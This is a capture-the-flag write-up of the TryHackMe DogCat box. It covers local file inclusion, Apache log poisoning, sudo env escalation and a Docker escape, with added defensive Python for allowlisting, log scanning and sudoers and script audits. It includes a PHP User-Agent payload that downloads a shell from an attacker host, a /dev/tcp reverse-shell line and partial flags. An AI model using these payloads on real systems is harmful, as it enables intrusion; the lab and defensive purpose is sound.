TryHackMe - DogCat

Initial Scan

nmap

nmap -sC -sV -oN nmap/dogcat 10.10.208.6

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 10:21 EDT
Nmap scan report for 10.10.208.6
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
| 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_ 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.14 seconds

Web Server

http://10.10.208.6/?view=dog

view=dog and view=cat show a dog and a cat picture respectively, so we try LFI on that parameter.

http://10.10.208.6/?view=./dog/../../../../etc/passwd

which gives us an error but confirms that we have LFI.

With the php://filter wrapper we can leak the index.php source code (base64-encoded); decoded, it reads:

http://10.10.208.6/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

<!DOCTYPE HTML>
<html>

<head>
<title>dogcat</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
<h1>dogcat</h1>
<i>a gallery of various dogs or cats</i>

<div>
<h2>What would you like to see?</h2>
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
<?php
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
    if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
        echo 'Here you go!';
        include $_GET['view'] . $ext;
    } else {
        echo 'Sorry, only dogs or cats are allowed.';
    }
}
?>
</div>
</body>

</html>

Now we know why "dog" or "cat" had to appear in the URL: the check is only a substring test, and the include appends $ext (".php" unless the ext parameter is supplied) to whatever we pass in view.
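To make the root cause concrete, here is an added example (not code from the original post, and not how the box's index.php is written): a Python model of the include check from the leaked source beside an allowlist version of the same lookup. WEB_ROOT and the payload list are constructed for the illustration; the payloads themselves are the ones used in this walkthrough.

```python
# Added example, not code from the original post: a Python model of the include
# check in the leaked index.php, next to an allowlist version of the same lookup.
# WEB_ROOT and the payload list are constructed for the illustration.
import posixpath

WEB_ROOT = "/var/www/html"   # assumed document root; only used to show where paths land


def vulnerable_resolve(view, ext=".php"):
    """Mirror of the original logic: any value containing 'dog' or 'cat' is
    accepted and the client string becomes the start of the include path."""
    if "dog" in view or "cat" in view:
        return view + ext
    return None


ALLOWED_VIEWS = {"dog": "dog.php", "cat": "cat.php"}


def safe_resolve(view):
    """Allowlist: the client's value is a dictionary key, never part of a path,
    so traversal sequences and stream wrappers cannot be expressed at all."""
    return ALLOWED_VIEWS.get(view)


def include_target(include_string):
    """Show what a relative include string resolves to once '..' is applied.
    Stream wrappers (php://, data://) are returned as-is: they never reach the
    filesystem path logic, which is why the filter trick leaks source."""
    if "://" in include_string:
        return include_string
    return posixpath.normpath(posixpath.join(WEB_ROOT, include_string))


if __name__ == "__main__":
    cases = [
        ("dog", ".php"),
        # the first probe: lands on /etc/passwd.php, hence the error message
        ("./dog/../../../../etc/passwd", ".php"),
        ("php://filter/read=convert.base64-encode/resource=./dog/../index", ".php"),
        # ext= supplied empty, so nothing is appended any more
        ("./dog/../../../../../../../../../var/log/apache2/access.log", ""),
    ]
    for view, ext in cases:
        inc = vulnerable_resolve(view, ext)
        print(f"view={view!r} ext={ext!r}")
        print(f"  substring check -> include {include_target(inc) if inc else None}")
        print(f"  allowlist       -> include {safe_resolve(view)}")
```

The point of the allowlist version is that the request value never becomes part of a path: there is nothing to traverse and no wrapper to select, so the `ext` parameter and the "dog"/"cat" substring test both become unnecessary.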

Getting flag1

http://10.10.208.6/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag

Note: this is only partial content.

PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxcwo=

decoded data

<?php
$flag_1 = "THM{Th1s

RCE

GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('f3v3r.php',file_get_contents('http://10.X.X.X/shell.php')); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

I was serving shell.php, which was php-reverse-shell.php, on port 80, with a nc listener on 9001 to get a shell back.

and opening

http://10.10.208.6/f3v3r.php

gives us the shell.
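Every step of this chain leaves a trace in the access log: the traversal probe, the php://filter request, the emptied ext parameter, and finally a User-Agent carrying PHP tags (the poisoned line is what the include later executes). As an added example that is not part of the original post, the scanner below parses Apache combined-format log lines and flags those indicators. The sample lines are constructed to mirror the requests in this walkthrough; the field regex and indicator names are mine.

```python
# Added example, not from the original post: flag LFI probes and log-poisoning
# attempts in Apache combined-format access logs. Sample lines are constructed.
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2020:10:25:01 -0400] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [09/May/2020:10:26:14 -0400] "GET /?view=./dog/../../../../etc/passwd HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.5 - - [09/May/2020:10:27:30 -0400] "GET /?view=php://filter/read=convert.base64-encode/resource=./dog/../index HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [09/May/2020:10:31:02 -0400] "GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 40311 "-" "<?php file_put_contents('f3v3r.php',file_get_contents('http://10.X.X.X/shell.php')); ?>"
10.0.0.5 - - [09/May/2020:10:31:40 -0400] "GET /f3v3r.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "req" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

WRAPPERS = ("php://", "data://", "expect://", "phar://")


def classify(line):
    """Return (ip, timestamp, decoded path, [indicators]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m["path"])          # decode %2e%2e style encodings before matching
    lowered = path.lower()
    findings = []
    if "../" in path or "..\\" in path:
        findings.append("path-traversal")
    if any(w in lowered for w in WRAPPERS):
        findings.append("php-wrapper")
    if re.search(r"[?&]ext=(&|$)", path):   # the app's own extension parameter, emptied
        findings.append("empty-ext")
    if "<?php" in m["ua"] or "<?=" in m["ua"] or "<?php" in m["referer"]:
        findings.append("php-tag-in-header")
    return m["ip"], m["ts"], path, findings


def scan(text):
    """All parsed lines that carry at least one indicator, in log order."""
    return [r for r in map(classify, text.splitlines()) if r and r[3]]


if __name__ == "__main__":
    for ip, ts, path, findings in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {','.join(findings):45} {path}")
```

The fifth sample line (the request for f3v3r.php) is deliberately not flagged: a newly dropped file looks like any other 200 in the log, so the detection has to key on the poisoning step that precedes it. On the mitigation side, the allowlist fix removes the include vector entirely, and keeping the web server's own log files unreadable to the PHP process removes the poisoning target.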

Flag2

$ whoami;hostname;cut -c 1-15 /var/www/flag2_QMW7JvaY2LvK.txt
www-data
9c79ecf0f992
THM{LF1_t0_RC3_
$

Privilege Escalation

sudo -l

Matching Defaults entries for www-data on 9c79ecf0f992:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 9c79ecf0f992:
(root) NOPASSWD: /usr/bin/env

so running

sudo env /bin/bash

gives us a root shell, but only inside the container.
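The rule that makes this possible is a NOPASSWD entry for a binary that runs whatever command it is given. As an added example that is not part of the original post, here is a small audit that parses either sudoers-style lines or the command lines of `sudo -l` output and reports rules of that shape. The SHELL_CAPABLE set is an assumed, illustrative list and the sudoers sample is constructed; only the www-data line reproduces the rule shown above.

```python
# Added example, not from the original post: flag sudo rules that grant a
# shell-capable binary as root. Sample input is constructed; the list of
# shell-capable programs is an assumed starting point, not a complete one.
import re

SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/env
backup ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data /backup
deploy ALL=(root) /usr/bin/systemctl restart app
"""

# The command lines as `sudo -l` printed them on the box.
SAMPLE_SUDO_L = """\
User www-data may run the following commands on 9c79ecf0f992:
    (root) NOPASSWD: /usr/bin/env
"""

SHELL_CAPABLE = {"env", "bash", "sh", "dash", "zsh", "vim", "vi", "find",
                 "awk", "perl", "python", "python3", "less", "more"}

# user host=(runas[:group]) [TAG: ...] command[, command]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s+"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
# (runas) [TAG: ...] command  -- the shape of `sudo -l` command lines
SUDO_L_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_rule(line):
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
    return {
        "user": m["user"],
        "runas_user": m["runas"].split(":")[0] or "root",
        "nopasswd": "NOPASSWD" in tags,
        "cmds": [c.strip() for c in m["cmds"].split(",")],
    }


def sudo_l_to_rules(text, user):
    """Rewrite `sudo -l` command lines as sudoers-style lines so audit() can read them."""
    rules = []
    for line in text.splitlines():
        m = SUDO_L_RE.match(line.strip())
        if m:
            rules.append(f"{user} ALL=({m['runas']}) {m['tags']}{m['cmds']}")
    return "\n".join(rules)


def audit(text):
    """(user, command, reason) for every non-root rule that yields root execution."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["user"] == "root":
            continue
        if rule["runas_user"] not in ("root", "ALL"):
            continue
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                findings.append((rule["user"], cmd, "unrestricted root"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                reason = "shell-capable binary as root"
                if rule["nopasswd"]:
                    reason += ", no password"
                findings.append((rule["user"], cmd, reason))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS):
        print("sudoers:", finding)
    for finding in audit(sudo_l_to_rules(SAMPLE_SUDO_L, "www-data")):
        print("sudo -l:", finding)
```

The rsync rule in the sample is not reported because rsync is not in the assumed list, which is the weakness of any fixed list: the durable fix is to grant a wrapper script with fixed arguments rather than a general-purpose binary, and to avoid giving the web server user any sudo rule at all.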

Flag 3

whoami;hostname;cut -c 1-5 flag3.txt
root
9c79ecf0f992
THM{D

Escaping the Docker

In the /opt/backups folder we see a script, so we modify it to give us a reverse shell.

cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
echo "#!/bin/bash" > backup.sh;echo "bash -i >& /dev/tcp/10.X.X.X/9002 0>&1" >> backup.sh
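The escape works because a privileged job on the host runs a script from a directory that the container's root can write (the shell comes back with hostname dogcat rather than the container id). As an added example that is not part of the original post, here is an audit that walks a scripts directory and reports files a privileged job should not execute as-is: writable by group or others, symlinked, sitting in a writable directory, or located under a mount that is shared with a container. The directory, files and the shared-mount list are constructed inside a temporary directory so the check runs offline.

```python
# Added example, not from the original post: audit a directory of scripts that a
# root cron job executes. The sample directory is constructed in a temp dir.
import os
import stat
import tempfile


def risk_reason(path, st, dir_writable, shared_roots):
    """First applicable reason a privileged job should not run this file, or None."""
    if stat.S_ISLNK(st.st_mode):
        return "symlink: target chosen by whoever created the link"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP:
        return "group-writable"
    if any(os.path.commonpath([path, root]) == root for root in shared_roots):
        return "on a mount shared with a container: container root can rewrite it"
    if dir_writable:
        return "parent directory writable: file can be replaced"
    return None


def risky_scripts(directory, shared_roots=()):
    """Sorted (path, reason) pairs for every file under `directory` that fails the check.
    shared_roots: directories that are bind-mounted into containers (an assumption the
    caller supplies; it cannot be derived from the file's mode bits alone)."""
    shared_roots = [os.path.abspath(r) for r in shared_roots]
    findings = []
    for dirpath, _dirnames, filenames in os.walk(directory):
        dir_mode = os.stat(dirpath).st_mode
        dir_writable = bool(dir_mode & (stat.S_IWGRP | stat.S_IWOTH))
        for name in filenames:
            path = os.path.abspath(os.path.join(dirpath, name))
            reason = risk_reason(path, os.lstat(path), dir_writable, shared_roots)
            if reason:
                findings.append((path, reason))
    return sorted(findings)


def demo():
    """Constructed layout: a sane script, a world-writable one, and a symlink,
    all inside a directory we declare to be shared with a container."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "ok.sh")
        bad = os.path.join(d, "backup.sh")
        for p in (good, bad):
            with open(p, "w") as fh:
                fh.write("#!/bin/bash\ntar cf /root/container/backup/backup.tar /root/container\n")
        os.chmod(good, 0o755)   # owner-only write
        os.chmod(bad, 0o777)    # anyone can rewrite it before the job runs
        os.symlink(good, os.path.join(d, "link.sh"))
        return [(os.path.basename(p), reason) for p, reason in risky_scripts(d, shared_roots=[d])]


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name:12} {reason}")
```

Mode bits alone would not catch this box's case, since the file is root-owned and root-writable on both sides of the mount; that is why the shared-mount list is a separate input. The corresponding fixes are to not execute anything from a path a container can write, or to mount such directories read-only into the container.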

Flag 4

nc -nvlp 9002
root@dogcat:~# whoami;hostname;cut -c 1-15 flag4.txt
whoami;hostname;cut -c 1-15 flag4.txt
root
dogcat
THM{esc4l4tions
root@dogcat:~#

and we have pwned Dogcat.

Author: Shubham Kumar
Link: https://f3v3r.in/thm/dogcat/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.